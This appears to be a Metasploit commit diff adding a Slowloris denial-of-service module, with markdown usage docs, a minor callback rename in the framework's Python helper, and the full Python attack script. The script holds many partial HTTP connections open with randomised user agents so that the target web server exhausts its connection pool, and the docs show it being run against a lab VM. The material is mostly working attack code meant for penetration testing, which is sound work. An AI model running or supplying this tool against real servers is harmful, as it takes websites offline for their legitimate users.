Land rapid7#9227, Add slowloris denial of service

acammack-r7 · acammack-r7 · commit 19844fb6ed7a · 2017-11-21T15:42:39.000-06:00
diff --git a/documentation/modules/auxiliary/dos/http/slowloris.md b/documentation/modules/auxiliary/dos/http/slowloris.md
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+This module tries to keep many connections to the target web server open and hold them open as long as possible.
+
+To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
+
+Vulnerable application versions include:
+
+- Apache HTTP Server 1.x and 2.x
+- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/dos/http/slowloris`
+3. Do: `set RHOST`
+4. Do: `run`
+5. Visit server URL in your web-browser.
+
+## Scenarios
+
+### Apache/2.2.8 - Ubuntu 8.04
+
+```
+msf > use auxiliary/dos/http/slowloris
+msf auxiliary(slowloris) > show options
+
+Module options (auxiliary/dos/http/slowloris):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   delay            15               yes       The delay between sending keep-alive headers
+   rand_user_agent  true             yes       Randomizes user-agent with each request
+   rhost            172.28.128.4     yes       The target address
+   rport            80               yes       The target port
+   sockets          150              yes       The number of sockets to use in the attack
+   ssl              false            yes       Negotiate SSL/TLS for outgoing connections
+
+msf auxiliary(slowloris) > set rhost 172.28.128.4
+rhost => 172.28.128.4
+msf auxiliary(slowloris) > run
+
+[*] Starting server...
+[*] Attacking 172.28.128.4 with 150 sockets
+[*] Creating sockets...
+[*] Sending keep-alive headers... Socket count: 150
+```
diff --git a/lib/msf/core/modules/external/python/metasploit/module.py b/lib/msf/core/modules/external/python/metasploit/module.py
@@ -21,15 +21,15 @@ def report_service(ip, opts={}):
     }})
 
 
-def run(metadata, exploit):
+def run(metadata, module_callback):
     req = json.loads(os.read(0, 10000))
     if req['method'] == 'describe':
         rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
     elif req['method'] == 'run':
         args = req['params']
-        exploit(args)
+        module_callback(args)
         rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': {
-            'message': 'Exploit completed'
+            'message': 'Module completed'
         }})
 
 def rpc_send(req):
diff --git a/modules/auxiliary/dos/http/slowloris.py b/modules/auxiliary/dos/http/slowloris.py
@@ -0,0 +1,130 @@
+#!/usr/bin/env python
+# Note, works with both python 2.7 and 3
+
+import random
+import socket
+import ssl
+import sys
+import time
+
+from metasploit import module
+
+metadata = {
+    'name': 'Slowloris Denial of Service Attack',
+    'description': '''
+        Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
+        It accomplishes this by opening connections to the target web server and sending a partial request.
+        Periodically, it will send subsequent HTTP headers, adding to-but never completing-the request.
+        Affected servers will keep these connections open, filling their maximum concurrent connection pool,
+        eventually denying additional connection attempts from clients.
+     ''',
+    'authors': [
+        'RSnake',  # Vulnerability disclosure
+        'Gokberk Yaltirakli',  # Simple slowloris in Python
+        'Daniel Teixeira',  # Metasploit module (Ruby)
+        'Matthew Kienow <matthew_kienow[AT]rapid7.com>'  # Metasploit external module (Python)
+    ],
+    'date': '2009-06-17',
+    'references': [
+        {'type': 'cve', 'ref': '2007-6750'},
+        {'type': 'cve', 'ref': '2010-2227'},
+        {'type': 'url', 'ref': 'https://www.exploit-db.com/exploits/8976/'},
+        {'type': 'url', 'ref': 'https://github.com/gkbrk/slowloris'}
+     ],
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
+        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 80},
+        'sockets': {'type': 'int', 'description': 'The number of sockets to use in the attack', 'required': True, 'default': 150},
+        'delay': {'type': 'int', 'description': 'The delay between sending keep-alive headers', 'required': True, 'default': 15},
+        'ssl': {'type': 'bool', 'description': 'Negotiate SSL/TLS for outgoing connections', 'required': True, 'default': False},
+        'rand_user_agent': {'type': 'bool', 'description': 'Randomizes user-agent with each request', 'required': True, 'default': True}
+     }}
+
+list_of_sockets = []
+user_agents = [
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
+    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
+    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
+]
+
+def init_socket(host, port, use_ssl=False, rand_user_agent=True):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.settimeout(4)
+
+    if use_ssl:
+        s = ssl.wrap_socket(s)
+
+    s.connect((host, port))
+
+    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
+
+    if rand_user_agent:
+        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
+    else:
+        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
+
+    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
+    return s
+
+def run(args):
+    host = args['rhost']
+    port = int(args['rport'])
+    use_ssl = args['ssl'] == "true"
+    rand_user_agent = args['rand_user_agent'] == "true"
+    socket_count = int(args['sockets'])
+    delay = int(args['delay'])
+
+    module.log("Attacking %s with %s sockets" % (host, socket_count), 'info')
+
+    module.log("Creating sockets...", 'info')
+    for i in range(socket_count):
+        try:
+            module.log("Creating socket number %s" % (i), 'debug')
+            s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
+        except socket.error:
+            break
+        list_of_sockets.append(s)
+
+    while True:
+        module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info')
+        for s in list(list_of_sockets):
+            try:
+                s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
+            except socket.error:
+                list_of_sockets.remove(s)
+
+        for _ in range(socket_count - len(list_of_sockets)):
+            module.log("Recreating socket...", 'debug')
+            try:
+                s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
+                if s:
+                    list_of_sockets.append(s)
+            except socket.error:
+                break
+        time.sleep(delay)
+
+if __name__ == "__main__":
+    module.run(metadata, run)
